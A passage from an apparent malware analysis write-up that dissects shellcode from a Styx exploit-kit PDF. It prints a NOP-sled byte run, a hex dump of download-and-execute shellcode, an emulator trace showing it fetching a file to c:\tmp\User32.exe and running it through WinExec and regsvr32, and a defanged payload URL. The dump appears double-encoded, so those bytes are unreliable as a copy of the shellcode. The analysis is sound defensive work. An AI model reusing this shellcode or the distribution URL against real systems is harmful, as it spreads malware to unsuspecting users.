@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><
90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><
90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>



3. The shellcode/binary content


Let's look at a hex/ASCII representation of the file:

0000000: c3a8 0000 0000 5dc2 83c3 ad05 31c3 8964  ......].....1..d
0000010: c28b 7130 c28b 760c c28b 761c c28b 4608  ..q0..v...v...F.
0000020: c28b 7e20 c28b 3666 394f 1875 c3b2 c2be  ..~ ..6f9O.u....
0000030: c3af 0000 0001 c3ae c2bf c38f 0000 0001  ................
0000040: c3af c3a8 c280 0100 00c2 89c3 aac2 81c3  ................
0000050: 82c3 af00 0000 5268 c280 0000 00c3 bfc2  ......Rh........
0000060: 95c3 8f00 0000 c289 c3aa c281 c382 c3af  ................
0000070: 0000 0031 c3b6 01c3 82c2 8ac2 9c35 0002  ...1.........5..
0000080: 0000 c280 c3bb 0074 06c2 881c 3246 c3ab  .......t....2F..
0000090: c3ae c386 0432 00c2 89c3 aac2 81c3 82c3  .....2..........
00000a0: a201 0000 52c3 bfc2 95c3 9300 0000 c289  ....R...........
00000b0: c3aa c281 c382 c3ad 0100 0052 50c3 bfc2  ...........RP...
00000c0: 95c3 9700 0000 6a00 6a00 c289 c3aa c281  ......j.j.......
00000d0: c382 c3af 0000 0052 c289 c3aa c281 c382  .......R........
00000e0: 0b02 0000 526a 00c3 bfc3 906a 05c2 89c3  ....Rj.....j....
00000f0: aac2 81c3 82c3 af00 0000 52c3 bfc2 95c3  ..........R.....
0000100: 9b00 0000 6a05 c289 c3aa c281 c382 c3a3  ....j...........
0000110: 0000 0052 c3bf c295 c39b 0000 006a 00c3  ...R.........j..
0000120: bfc2 95c3 9f00 0000 0000 0000 0000 0000  ................
0000130: 0000 0000 0000 0000 0000 0000 7265 6773  ............regs
0000140: 7672 3332 202d 7320 4765 7454 656d 7050  vr32 -s GetTempP
0000150: 6174 6841 004c 6f61 644c 6962 7261 7279  athA.LoadLibrary
0000160: 4100 4765 7450 726f 6341 6464 7265 7373  A.GetProcAddress
0000170: 0057 696e 4578 6563 0045 7869 7450 726f  .WinExec.ExitPro
0000180: 6365 7373 00c2 bbc2 89c3 b2c2 89c3 b730  cess...........0
0000190: c380 c2ae 75c3 bd29 c3b7 c289 c3b9 31c3  ....u..)......1.
00001a0: 80c2 be3c 0000 0003 c2b5 c2b8 0100 0066  ...<...........f
00001b0: c2ad 03c2 85c2 b801 0000 c28b 7078 c283  ............px..
00001c0: c386 1c03 c2b5 c2b8 0100 00c2 8dc2 bdc2  ................
00001d0: bc01 0000 c2ad 03c2 85c2 b801 0000 c2ab  ................
00001e0: c2ad 03c2 85c2 b801 0000 50c2 abc2 ad03  ..........P.....
00001f0: c285 c2b8 0100 00c2 ab5e 31c3 9bc2 ad56  .........^1....V
0000200: 03c2 85c2 b801 0000 c289 c386 c289 c397  ................
0000210: 51c3 bcc3 b3c2 a659 7404 5e43 c3ab c3a9  Q......Yt.^C....
0000220: 5ec2 93c3 91c3 a003 c285 c384 0100 0031  ^..............1
0000230: c3b6 c296 66c2 adc3 81c3 a002 03c2 85c2  ....f...........
0000240: bc01 0000 c289 c386 c2ad 03c2 85c2 b801  ................
0000250: 0000 c383 c3ab 1000 0000 0000 0000 0000  ................
0000260: 0000 0000 0000 00c2 89c2 85c2 b801 0000  ................
0000270: 5657 c3a8 58c3 bfc3 bfc3 bf5f 5ec2 ab01  VW..X......_^...
0000280: c38e c280 3ec2 bb74 02c3 abc3 adc3 8355  ....>..t.......U
0000290: 524c 4d4f 4e2e 444c 4c00 5552 4c44 6f77  RLMON.DLL.URLDow
00002a0: 6e6c 6f61 6454 6f46 696c 6541 0055 7365  nloadToFileA.Use
00002b0: 7233 322e 6578 6500 2668 3d30 3300 0000  r32.exe.&h=03...
00002c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00002d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................



We can see what will be performed: a regsvr32 call and a file download. We cannot, however, see where the file is downloaded from. That "h=03" looks strange. It does not look XORed either, but let's see:

4. Emulating execution


Let's see if we can get more by running the code:

$sctest -Ss 1000000000 < shell.bin

Hook me Captain Cook!
userhooks.c:108 user_hook_ExitProcess
ExitProcess(0)
stepcount 34540
[emu 0x0x8469078 debug ] cpu state    eip=0x004170cf
[emu 0x0x8469078 debug ] eax=0x00000020  ecx=0x0000000c  edx=0x004170e3  ebx=0x7c805800
[emu 0x0x8469078 debug ] esp=0x00416fce  ebp=0x00417000  esi=0x0000000a  edi=0x004170e3
[emu 0x0x8469078 debug ] Flags:
DWORD GetTempPathA (
     DWORD nBufferLength = 128;
     LPTSTR lpBuffer = 0x004170ef =>
           = "c:\tmp\";
) =  7;
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x004171e2 =>
           = "URLMON.DLL";
) = 0x7df20000;
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7df20000 =>
         none;
     LPCSTR lpProcName = 0x004171ed =>
           = "URLDownloadToFileA";
) = 0x7df7b0bb;
HRESULT URLDownloadToFile (
     LPUNKNOWN pCaller = 0x00000000 =>
         none;
     LPCTSTR szURL = 0x0041720b =>
           = "&h=03";
     LPCTSTR szFileName = 0x004170ef =>
           = "c:\tmp\User32.exe";
     DWORD dwReserved = 0;
     LPBINDSTATUSCALLBACK lpfnCB = 0;
) =  0;
UINT WINAPI WinExec (
     LPCSTR lpCmdLine = 0x004170ef =>
           = "c:\tmp\User32.exe";
     UINT uCmdShow = 5;
) =  32;
UINT WINAPI WinExec (
     LPCSTR lpCmdLine = 0x004170e3 =>
           = "regsvr32 -s c:\tmp\User32.exe";
     UINT uCmdShow = 5;
) =  32;
void ExitProcess (
     UINT uExitCode = 0;
) =  0;



Nothing more. I guess the bad guys were too quick on this one and forgot to add the full URL to the malware.


5. Epilogue


If we look at the Styx URL for the EXE files:


hxxp: //rupscare.org/zNUdi611VKX0IDkq01jcK0dBBK0Q58F0rlJQ0HCzj0CaX90rFSv0076B01qoF05Oka0sF6F0xPVY16jTn17bNp0odl10d0TL0629S0F84i0FHxP0wT6105b9D0FEWS0Kr4U0swQx0ZdqR0Dw0B0wCUu0ZkH50rXuR0Uc7v0skdD0MhrU15SwC0iNDa0iOGF0HCX113Tui/xMCOakDS1p.exe?gO=aTtOki&h=11

we can see that the "h=03" fits into the picture and the assumption above should stick.


Happy Styx PDF peeling :)